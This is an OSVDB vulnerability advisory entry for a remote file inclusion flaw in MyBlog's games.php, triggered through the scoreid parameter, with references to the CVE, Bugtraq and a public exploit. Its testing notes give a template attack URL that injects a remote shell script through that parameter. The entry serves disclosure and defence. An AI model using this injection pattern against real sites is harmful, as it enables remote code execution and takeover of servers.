MyBlog games.php scoreid Variable Remote File Inclusion

2007-04-04T09:06:46
ID OSVDB:35263
Type osvdb
Reporter OSVDB
Modified 2007-04-04T09:06:46

Description

Manual Testing Notes

http://[target]/[path]/games.php?scoreid=[Sh3ll-Script]

References:

Vendor URL: http://sourceforge.net/projects/myblog/
Mail List Post: http://archives.neohapsis.com/archives/bugtraq/2007-04/0084.html
Mail List Post: http://attrition.org/pipermail/vim/2007-April/001503.html
Generic Exploit URL: http://www.milw0rm.com/exploits/3685
FrSIRT Advisory: ADV-2007-1302
CVE-2007-1968
Bugtraq ID: 23311